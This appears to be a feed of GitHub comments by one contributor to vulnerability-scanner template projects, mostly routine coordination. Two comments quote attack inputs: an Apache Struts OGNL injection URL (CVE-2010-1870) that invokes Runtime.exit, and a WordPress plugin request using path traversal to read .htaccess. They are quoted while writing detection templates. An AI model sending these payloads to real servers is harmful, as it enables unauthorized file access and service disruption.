Muhammad Daffa
Muhammad Daffa
Hi @cyb3r-n3rd thank you for the pull request! Can you add more information to help me create information about SQL injection? like the description, where to found this bug, and...
@geeknik sure! Let me add it in the next version
I think list of domains can be inputted into the tools, for example ``` https://admin.example.com https://pay.example.com https://example.com ``` Ref: https://twitter.com/MeAsHacker_HNA/status/1538862580684443649
@ehsandeep @princechaddha I found this https://www.exploit-db.com/exploits/14360 ``` http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRunti me()))=1 ``` But I don't know the matcher
``` id: CVE-2010-1870 info: name: ListSERV Maestro
For more information, I am using Windows 10
More information again: this issue also appears in nuclei version 2.7.0, right now I am downgrading my nuclei from 2.7.1 to 2.6.9 I am download using this link - [nuclei_2.7.0_windows_amd64.zip](https://github.com/projectdiscovery/nuclei/releases/download/v2.7.0/nuclei_2.7.0_windows_amd64.zip)...
Hi @akincibor, in the request ``` action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid ``` There are some interesting parameters to check - page_id - widget_id - nonce Can you explain, where do you get the value...
But if someone makes a template to check the version, I think it's still possible :)
No problem bro, keep it up. I am always waiting for your template :))